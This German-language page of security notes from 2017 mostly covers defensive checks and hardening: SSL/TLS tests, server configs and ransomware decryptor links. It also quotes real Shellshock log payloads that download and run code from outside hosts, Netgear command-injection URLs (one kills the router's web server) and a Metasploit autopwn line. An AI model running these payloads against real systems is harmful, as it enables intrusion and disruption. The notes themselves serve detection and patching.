07.10.2017

Security Hinweise

Virusscanner Test String
Kryptographische Standards
Perfect Forward Secrecy (PFS) Test
Microsoft Datenbank Hintertür
Apache Web Server 2.0 Leck stopfen
Windows Dienste Datenaustausch mit dem Desktop verhindern
SMB-Protokoll Sicherheitslücke unter Windows
Kerio Personal-Firewall Einstellung
CoolWebSearch
Webscarab Proxy
UDP Hole Punching
DNS Server absichern
OpenSSL Heartbleed-Exploit
Shellshock
POODLE vulnerability
Glibc GHOST Vulnerability
Freak Attack (Factoring Attack on RSA-EXPORT Keys)
DROWN Attack
HTTP_PROXY Header Fehler
Kapern von Linux HTTP-Verbindungen
Web Proxy Autodiscovery Protocol (WPAD)
Erweitern der Rechte unter Linux
Netgear-Router Sicherheitslücke
sonstiges

Deine IP-Adresse ist die 54.196.72.162
Dein Browser: CCBot/2.0 (http://commoncrawl.org/faq/)


Links:
Metasploit Project
Goolag
NTPD
Maltego Systemanalyse, Netzwerkanalyse wird Grafisch dargestellt.
Ukash/Paysafe-Trojaner
Google Safebrowsing (www.google.de durch die zu abfragende Domain ersetzen)
Google Security Research
SSL sicher konfigurieren (bettercrypto.org)
SSL Server Sicherheit testen (www.ssllabs.com)
Observatory by Mozilla
Hacking the Western Digital MyCloud NAS

Seitenanfang

Virusscanner Test String

EICAR Antivirus Test String
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Der String kann in einer .com Datei gespeichert werden.

Seitenanfang

Kryptographische Standards

!!! Die Aufzählung erhebt kein Anspruch auf Vollständigkeit !!!

aktuelle Standards unsichere Standards
Verschlüsselung
AES-GCM, CHA-CHA20/Poly1305, Camellia RC4, 3DES-CBC, AES-CBC
Krypo Hash
SHA2, SHA-256, SHA-512/256, SHA-384 ,SHA-512, SHA3-256, SHA3-384, SHA3-512 MD5, SHA1
Protokolle
TLS1.2 mit PFS, TLS1.3 SSLv2, SSLv3, TLS1.0, TLS1.1
Zertifikate
Zertifikate >= 2048Bit RSA, Elliptische Kurve Zertifikate < 2048Bit RSA

BSI Unsichere kryptographische Algorithmen
Kryptographie in der IT - Empfehlungen zu Verschlüsselung und Verfahren

Cipher Block Chaining (CBC)
Galois/Counter Mode (GCM)
Transport Layer Security (TLS)

 

Seitenanfang

Perfect Forward Secrecy (PFS) Test

Heise Artikel

- IMAP Server SSL Test

openssl s_client -connect imap.domain.tld:993
...
Cipher    : ECDHE-RSA-AES256-SHA
...

DH oder ECDHE zeigt an, Forward Secrecy ist zwischen den Kommunikationspartnern aktiv

- Test ob der Server Forward Secrecy beherrscht

openssl s_client -cipher 'ECDH:DH' -connect www.domain.tld:443

- Forward Secrecy Test, Verschlüsselung über STARTTLS

openssl s_client -starttls smtp -connect smtp.domain.tld:587

SMTP, POP3, IMAP und FTP werden als Protokoll auch noch unterstützt.

Seitenanfang

Microsoft Datenbank Hintertür

Microsoft SQL Server Desktop Engine legt ein Benutzerkonto "sa" auf dem Rechner an, das Kennwort ist leer. Der Datenbankserver nimmt Anfragen über das Netzwerk auf TCP/IP Port 1433 an. Den laufenden MSDE erkennt man am Symbol in der Taskleiste, oder mit "NETSTAT -A". Das Passwort läst sich ändern mit dem Tool \BINN\OSQL -U sa -Q "sp_password NULL, 'geheim'" man wird zunächst nach dem Alten Password für den Benutzer "sa" gefragt, dann wird das Kennwort in "geheim" geändert in der Datenbank.

Seitenanfang

Apache Web Server 2.0 Leck stopfen

Bis zur Version 2.0.40 hat der Apache Webserver ein Fehler, der tritt nur in den nicht Unix Versionen auf. Der Fehler kann beseitigen werden, indem man in der Datei httpd.conf die Anweisung RedirectMatch 400 "\\\.\." einzufügen, und zwar vor dem ersten Auftreten eines Alias- oder Redirect-Befehls.

Seitenanfang

Windows Dienste Datenaustausch mit dem Desktop verhindern

eine Sicherheitslücke in Windows, kann ausgenutzt werden um Befehle auszuführen.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows]
"NoInteractiveServices"=dword:00000001

Seitenanfang

SMB-Protokoll Sicherheitslücke unter Windows

der Patch MS02-045 oder Q326830 beseitigen einen Fehler im SMB-Protokoll von Microsoft, der Fehler macht ein Denial of Service Angriff möglich

Seitenanfang

Kerio Personal-Firewall Einstellung

Um zu verhindern, das Verbindungen ohne aktiver Firewall ins Internet gehen, muss dieser Eintrag in der Registry erstellt werden.
Für W2k und WXP
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\fwdrv]
"AlwaysSecure"=dword:00000001
Für W9x
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VXD\fwdrv]
"AlwaysSecure"=dword:00000001

Seitenanfang

CoolWebSearch

Bei dem Befall mit CWS verliert der Nutzer die Kontrolle über den Browser, es werden unerwünscht Internetseiten aufgerufen, beim besuch von Google werden Popups eingeblendet oder die Suche auf eine andere Seite umgeleitet, die Startseite des Browsers wird geändert usw., kurz gesagt der Browser ist Entführt (Hijacking).

Tools zur Entfernung:
CWShredder & HijackThis

Seitenanfang

Webscarab Proxy

Webscarab ist ein Java Proxy auf Port 8008 der die Pakete zwischen Browser und Server mitschneidet. Man kann mit ihm HTTP als auch HTTPS Pakete protokollieren.

WebScarab Download

Webscarab kann man über eine Batch starten, voraussetzung JAVA ist installiert.

java -jar webscarab-selfcontained-20060718-1904.jar
Seitenanfang

UDP Hole Punching

mit Netcat und HPing2
Scenario ein Rechner LOCAL hinter einer Stateful Firewall die UDP Verbindungen ins INet zulässt.

mit Netcat einen UDP-Listener auf Port 14000 starten

local/1# nc -u -l -p 14000

mit einer zweiten Rechner (REMOTE) im INet versuchen eine Nachricht zu schicken

remote# echo "hello" | nc -p 53 -u local-fw 14000

der erste Versuch mit LOCAL Kontakt aufzunehmen schlägt fehl, da die Firewall keine Verbindungsversuche von ausserhalb annimmt.

auf einer zweiten Console von LOCAL mit HPing2 eine Verbindung initialisieren

local/2# hping2 -c 1 -2 -s 14000 -p 53 remote

REMOTE meldet daraufhin via ICMP "Port Unreachable" zurück, aber die Firewall hat für LOCAL einen Port geöffnet mit dem REMOTE den LOCAL erreichen kann

remote# echo "hello" | nc -p 53 -u local-fw 14000

der Listener von Netcat auf LOCAL meldet daraufhin ein "HELLO", das Paket hat die Firewall passiert und ist zum Rechner dahinter gelangt.

Seitenanfang

DNS Server absichern

DNS Cache Poisoning
DDoS-Attacke durch recursive DNS-Queries

im Beispiel den ns1.example.com durch den DNS Server ersetzen der getestet werden soll.

dig +short @ns1.example.com porttest.dns-oarc.net TXT

Weiterleitung testen.

host google.com ns1.example.com

Weiterleitung von Anfragen nach Domains, für die der Server nicht verantwortlich ist deaktivieren.

# /etc/bind/named.conf.options
options {
	...
	allow-recursion { none; };
	...
};

oder auf das eigene Intranet Netzwerk beschränken.

# /etc/bind/named.conf.options
options {
	...
	allow-recursion { 10.0.0.0/8; 192.168.0.0/24;
	127.0.0.0/8; ::1; };
	...
};
Seitenanfang

OpenSSL Heartbleed-Exploit

Heise Artikel zum Exploit

SSL Bug check Datei hb-test.py
OpenMAGIC

Seitenanfang

Shellshock

Wiki Artikel

Auszug aus dem Apache LOG File

() { :;}; /bin/bash -c \"cd /var/tmp ; rm -rf j* ; wget http://89.33.193.10/ji ; lwp-download \
 http://89.33.193.10/ji;curl -O /var/tmp/ji http://89.33.193.10/ji ; perl /var/tmp/ji ; rm -rf *ji;rm -rf jur\"
"GET /cgi-bin/test-cgi HTTP/1.0" 404 496 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot
 -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\""
"GET /cgi-bin/helpme HTTP/1.0" 404 494 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl
 -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\""
"GET /cgi-bin/test-cgi HTTP/1.0" 404 496 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot
 -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\""
"GET /cgi-bin/bash HTTP/1.0" 404 492 "-" "() { :;}; /bin/bash -c \"wget http://ellrich.com/legend.txt
 -O /tmp/.bash;killall -9 perl;perl /tmp/.bash\""
"GET / HTTP/1.0" 200 628 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot
 -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\""
"GET /cgi-bin/helpme HTTP/1.0" 404 461 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl
 -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\""

- Shellschock Test auf der Konsole

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

wenn die Ausgabe wie folgt, ist alles gepatcht.

this is a test

bei der Ausgabe, ist der Patch nicht eingepielt.

vulnerable
this is a test
Seitenanfang

POODLE vulnerability

Wikipedia POODLE

SSLv3 deaktivieren

- Apache Webserver

# /etc/apache2/mods-enabled/ssl.conf
...
SSLProtocol All -SSLv2 -SSLv3
...
service apache2 restart

- Postfix SMTP Server

# /etc/postfix/main.cf
...
smtpd_tls_mandatory_protocols = !SSLv2 !SSLv3
smtp_tls_mandatory_protocols = !SSLv2 !SSLv3
smtp_tls_protocols = !SSLv2, !SSLv3
smtpd_tls_protocols = !SSLv2 !SSLv3
...

- Dovecot

# /etc/dovecot/conf.d/10-ssl.conf
...
ssl_protocols = !SSLv2 !SSLv3
...

SSLv3 Test

openssl s_client -ssl3 -connect <server>:25 -starttls smtp
openssl s_client -ssl3 -connect <server>:110 -starttls pop3
openssl s_client -ssl3 -connect <server>:143 -starttls imap
openssl s_client -ssl3 -connect <server>:237
openssl s_client -ssl3 -connect <server>:443
openssl s_client -ssl3 -connect <server>:465
openssl s_client -ssl3 -connect <server>:587 -starttls smtp
openssl s_client -ssl3 -connect <server>:993
openssl s_client -ssl3 -connect <server>:995
openssl s_client -ssl3 -connect <server>:8443

wenn der Handshake fehlschlägt, ist SSLv3 deaktiviert sslv3 alert handshake failure

# openssl s_client -ssl3 -connect <server>:587 -starttls smtp
CONNECTED(00000003)
139935036806848:error:14094410:SSL routines:SSL3_READ_BYTES:sslv3 alert handshake failure:s3_pkt.c:1260:SSL
 alert number 40
139935036806848:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure:s3_pkt.c:596:
Seitenanfang

Glibc GHOST Vulnerability

Glibc Ghost

Version der Glibc anzeigen und abhängige Programme auflisten.

ldd --version
lsof | grep libc | awk '{print $1}' | sort | uniq
Seitenanfang

Freak Attack (Factoring Attack on RSA-EXPORT Keys)

Der SSL gesicherte Server fällt auf einen unsicheren 512-Bit-Schlüssel zurück.

-

openssl s_client -connect www.domain.tld:443 -cipher EXPORT

wenn die Ausgabe handshake failure erscheint, ist der Server sicher.

Seitenanfang

DROWN Attack

Check The DROWN Attack

Python Script Check

- Laden der Scripte

cd ~
mkdir drown
cd drown
git clone https://github.com/tomato42/tlsfuzzer
cd tlsfuzzer
git checkout ssl2
git clone https://github.com/tomato42/tlslite-ng .tlslite-ng
ln -s .tlslite-ng/tlslite tlslite
cd .tlslite-ng/
git checkout sslv2
cd ~/drown/tlsfuzzer
git clone https://github.com/warner/python-ecdsa .python-ecdsa
ln -s .python-ecdsa/ecdsa ecdsa

- Check durchführen, wenn alles OK ist, sieht es wie folgt aus.

cd ~/drown/tlsfuzzer
PYTHONPATH=. python scripts/test-sslv2-force-export-cipher.py -h 192.168.101.2 -p 443

Connect with TLSv1.0 EXP-RC4-MD5 ...
OK
Connect with SSLv2 EXP-RC4-MD5 ...
OK
Connect with SSLv3 EXP-RC4-MD5 ...
OK
Connect with TLSv1.0 EXP-RC2-CBC-MD5 ...
OK
Connect with SSLv3 EXP-RC2-CBC-MD5 ...
OK
Connect with SSLv2 EXP-RC2-CBC-MD5 ...
OK
Note: SSLv2 was officially deprecated (MUST NOT use) in 2011, see
      RFC 6176.
      If one or more of the tests fails because of error in form of

      Unexpected message from peer: Handshake()

      With any number inside parethensis, and the server is
      configured to not support SSLv2, it means it most
      likely is vulnerable to CVE-2015-3197 and CVE-2016-0800.
      In case it's a RC4 or 3DES cipher, you may verify that it
      really supports it using:
      test-sslv2-connection.py

Test end
successful: 6
failed: 0

- Apache SSL Konfiguration anpassen

SSLProtocol All -SSLv2 -SSLv3
Seitenanfang

HTTP_PROXY Header Fehler

httpoxy.org

- Datei test.php auf dem WebServer erstellen, mit folgenden Inhalt

<?php var_dump($_SERVER['HTTP_PROXY']);

Proxy Test

curl -H "PROXY: http://example.invalid" http://example.org/test.php
Seitenanfang

Kapern von Linux HTTP-Verbindungen

vom Kernel 3.6 bis 4.7 ist es möglich HTTP Verbindungen zu kapern, das Linuxsystem hat ein Limit vom 100 ACK Paketen pro Sekunde voreingestellt. Wir der Rechner mit präparierten Paketen bombardieren, ist das Limit vom 100 ACK Paketen schnell erreicht und er verschickt keine ACK-Pakete mehr.

- Limit in der sysctl.conf erhöhen

# /etc/sysctl.conf
net.ipv4.tcp_challenge_ack_limit = 999999999

- neue Einstellungen aktivieren

sysctl -p
Seitenanfang

Web Proxy Autodiscovery Protocol (WPAD)

Wiki WPAD

Ist die WPAD Konfiguration nicht unter der URL http://wpad.example.com/wpad.dat verfügbar, kann es vorkommen das der Browser die Datei unter http://wpad.com/wpad.dat oder http://wpad.de/wpad.dat sucht.
Wenn dann unter der externen Domain die Datei gefunden wird, kann ein Angreifer ein Proxy für Man-in-the-Middle Angriffe platzieren.

Seitenanfang

Erweitern der Rechte unter Linux

BUG Report
CVE-2016-8655

- testen ob ein System verwundbar ist, Debian ist in der Default Konfiguration nicht anfällig, Ubuntu ist anfällig.

sysctl -a | fgrep kernel.unprivileged_userns_clone
# kein Problem
kernel.unprivileged_userns_clone = 0

# bei der Ausgabe ist das System anfällig
kernel.unprivileged_userns_clone = 1
sysctl: Schlüssel »net.ipv6.conf.all.stable_secret« wird gelesen
sysctl: Schlüssel »net.ipv6.conf.default.stable_secret« wird gelesen
sysctl: Schlüssel »net.ipv6.conf.eth0.stable_secret« wird gelesen
sysctl: Schlüssel »net.ipv6.conf.lo.stable_secret« wird gelesen
Seitenanfang

Netgear-Router Sicherheitslücke

Router finden, die von der Lücke betroffen sind.

PC mit dem Netzwerk des Netgear Routers verbinden und den Link aufrufen. http://www.routerlogin.net/cgi-bin/;echo$IFS'Verwundbar!'

Wenn die Meldung "Verwundbar!" ausgegeben wird, ist der Router betroffen. Abhilfe erreicht man durch einspielen eines Firmware Updates oder den Prozess des Webservers auf dem Router zu "Killen" http://www.routerlogin.net/cgi-bin/;killall$IFS'httpd'

Nach dem beenden des Webservers auf dem Router, kann dieser bis zum Neustart nicht mehr administriert werden.

Seitenanfang

sonstiges

Navigation:

Wordlist Downloads

hashcrack.blogspot.de
ixplizit
crackstation.net
md5this.com

HOST Datei Adware Vorlage

Seitenanfang

Metasploit Project

Metasploit Project Page

Metasploit Project ist ein Schwachstellen-Test Framework.

Brutal Force Attacke

db_autopwn -t -p -e -s- b
Seitenanfang

Goolag

Goolag
Google Hacking Database

mit Goolag läßt sich über Google eine Sicherheitsschwachstellensuche der Domain initialisieren.

Seitenanfang

Samba Schwachstelle

# smb.conf
[global]
...
wide links = no
...
smbclient //localhost/ -U user%pass
Seitenanfang

NTPD

ntpd access restrictions

ntpdc -n -c monlist <IP>
# /etc/ntp.conf
disable monitor
restrict default kod nomodify notrap nopeer noquery
restrict -6 default kod nomodify notrap nopeer noquery
Seitenanfang

VirusDecrypter / VirusDecoder

TeslaCrypt Decryption Tool
Eset TeslaCrypt-Decoder mit MasterKey
Kaspersky Virus-fighting utilities
MalWareRemovalGuides
Trend Micro Ransomware File Decryptor
Stampado Decrypter

ID-Ransomware - herrausfinden, welche Ransomware den Rechner verschlüsselt hat und ob es Decrypter gibt.
No more Ransom - Ransomware identifizieren durch Fileupload von verschlüsselten Dateien.

2016.04 - Trojan-Ransom.Win32.CryptXXX, erstellt <Orginal-Dateiname>.crypt
im Verzeichnis werden auch noch folgende Dateien angelegt

de_crypt_readme.bmp
de_crypt_readme.html
de_crypt_readme.txt

RannohDecryptor, Anleitung

folgende Verzeichnisse sind zu bereinigen

C:\Users\<UserName>\AppData\Local\Temp\
C:\Users\<UserName>\AppData\LocalLow\
C:\ProgramData\{xxx-xxx-xxx}

2016.05 - Alpha Ransomware, erstellt <Orginal-Dateiname>.encrypt Dateien.

Artikel, Download Decryptor

Alpha Ransomware Encryption Process wird über die Datei gestartet.

%APPDATA%\Windows\svchost.exe

im Verzeichnis werden folgende Dateien angelegt.

Read Me (How Decrypt) !!!!.txt

in der Registry wird noch der Taskmanager des Benutzers mit folgenden Eintrag blockiert.

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr" = dword: 00000001
Seitenanfang

Netzwerk nach Intel "Active Management Technology" (AMT) Lücke scannen

INTEL-SA-00075 Detection Guide
Intel® SCS – System Discovery Utility

- Netzwerk scannen

nmap -p16992-16995 192.168.2.0/24 | grep "16992/tcp open" -A4 -B3

- unter Windows Lokal prüfen

netstat -ano | findstr "\<16993\> \<16992\> \<16994\> \<16995\> \<623\> \<664\>"